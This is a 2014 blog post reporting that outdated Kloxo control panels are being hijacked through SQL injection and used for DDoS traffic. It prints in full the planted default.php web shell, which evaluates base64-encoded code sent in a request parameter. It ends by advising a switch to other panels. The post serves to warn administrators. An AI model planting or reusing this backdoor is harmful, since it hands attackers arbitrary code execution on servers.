Tuesday, January 28, 2014

Kloxo Compromised & Hacked With an SQL Injection Vulnerability

Kloxo Hack

Kloxo is an open source free web hosting platform that helps a server administrator manage their webservers, database servers, DNS servers and much more using a graphical user interface.

Kloxo is now outdated, and the last issued update was over two years ago.

After zPanel appeared to be vulnerable last month, it seems that Kloxo, which is another free Control Panel is the today's victim.

According to VPSBoard, Kloxo is spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDOS.

The affected targets are getting their Kloxo installations hacked with SQL Injection through webcommand.php file which is granting the attacker Kloxo admin access.

The attacker is then injecting a file called default.php into every Kloxo account through display.php, and changing the owner of the default.php to root.

The injected default.php contains the following code:
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
The above code is basically taking an encoded variable that contains a code written by the attacker. The code will be decoded and executed on the server. Just imagine all the fun you can have with someone's server if you are able to execute any command you wish.

As a security measure, it's advised to remove your Kloxo Control Panel and replace it by a up to date Panel.

A good easy to use free control panel that is gaining a lot of popularity lately is: VestaCP
If you want a more complicated free control panel to manage your virtual hosts and servers, you can always go with Virtualmin.